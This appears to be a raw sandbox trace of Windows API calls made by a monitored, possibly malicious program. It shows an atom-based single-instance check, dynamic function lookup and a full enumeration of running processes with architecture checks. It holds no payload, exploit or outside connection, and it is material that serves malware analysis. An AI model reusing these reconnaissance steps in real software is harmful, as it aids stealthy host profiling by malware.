	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.978] GetLastError () returned 0x5
	[0084.979] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.979] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0084.979] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.979] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0084.979] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0084.979] CloseHandle (hObject=0x6a0) returned 1
	[0084.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0084.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0084.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x6a0
	[0084.980] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.980] CloseHandle (hObject=0x6a0) returned 1
	[0084.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397ea88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0084.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x6a0
	[0084.980] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.980] CloseHandle (hObject=0x6a0) returned 1
	[0084.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="tmp8C77.tmp", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmp8C77.tmp", lpUsedDefaultChar=0x0) returned 11
	[0085.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x170c8) returned 0xc0000004
	[0085.050] VirtualAlloc (lpAddress=0x0, dwSize=0x171c8, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0085.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x171c8, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0085.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0085.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397e8c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0085.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0085.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0085.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0085.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0085.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0085.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0085.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0085.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397eab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0085.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397e9c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0085.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0085.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0085.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0085.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76c950, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0085.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0085.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0085.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0085.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.087] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0085.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0085.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0085.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0085.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0085.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x6a0
	[0085.102] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.102] CloseHandle (hObject=0x6a0) returned 1
	[0085.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0085.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0085.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0085.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396ea50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0085.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x6a0
	[0085.103] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.103] CloseHandle (hObject=0x6a0) returned 1
	[0085.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396e930, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0085.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0085.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x6a0
	[0085.103] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.103] CloseHandle (hObject=0x6a0) returned 1
	[0085.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e9f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x6a0
	[0085.104] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.104] CloseHandle (hObject=0x6a0) returned 1
	[0085.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x6a0
	[0085.104] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.104] CloseHandle (hObject=0x6a0) returned 1
	[0085.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x6a0
	[0085.104] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.104] CloseHandle (hObject=0x6a0) returned 1
	[0085.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396eab0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0085.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x6a0
	[0085.105] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.105] CloseHandle (hObject=0x6a0) returned 1
	[0085.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x6a0
	[0085.105] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.105] CloseHandle (hObject=0x6a0) returned 1
	[0085.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0085.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x6a0
	[0085.105] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.105] CloseHandle (hObject=0x6a0) returned 1
	[0085.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397ea88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x6a0
	[0085.106] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.106] CloseHandle (hObject=0x6a0) returned 1
	[0085.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x6a0
	[0085.106] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.106] CloseHandle (hObject=0x6a0) returned 1
	[0085.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396eb30, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0085.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0085.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e9f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0085.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x6a0
	[0085.106] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.106] CloseHandle (hObject=0x6a0) returned 1
	[0085.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396e870, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0085.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x6a0
	[0085.107] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.107] CloseHandle (hObject=0x6a0) returned 1
	[0085.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76c900, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0085.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x6a0
	[0085.107] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.107] CloseHandle (hObject=0x6a0) returned 1
	[0085.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396e870, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0085.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x6a0
	[0085.107] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.107] CloseHandle (hObject=0x6a0) returned 1
	[0085.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39a1cb8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0085.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x6a0
	[0085.108] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.108] CloseHandle (hObject=0x6a0) returned 1
	[0085.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396e7d0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0085.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x6a0
	[0085.108] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.108] CloseHandle (hObject=0x6a0) returned 1
	[0085.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397eab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0085.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x6a0
	[0085.108] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.108] CloseHandle (hObject=0x6a0) returned 1
	[0085.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0085.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x6a0
	[0085.108] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.108] CloseHandle (hObject=0x6a0) returned 1
	[0085.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396e870, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0085.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x6a0
	[0085.109] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0085.109] CloseHandle (hObject=0x6a0) returned 1
